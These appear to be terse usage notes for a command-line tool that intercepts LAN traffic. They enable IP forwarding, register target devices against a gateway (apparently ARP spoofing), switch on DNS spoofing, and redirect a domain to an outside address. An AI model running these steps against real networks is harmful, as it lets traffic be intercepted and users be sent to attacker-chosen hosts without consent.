sudo sysctl -w net.ipv4.ip_forward=1
python cli.py --gateway 192.168.3.1 --target 192.168.3.110 register target device
python cli.py -l to list
python cli.py --gateway 192.168.3.1 --target 192.168.3.114 --dns to enable dns spoofing
python cli.py --dns --domain example.test --target 34.206.58.73 (httpbin.org)
python cli.py --dns --list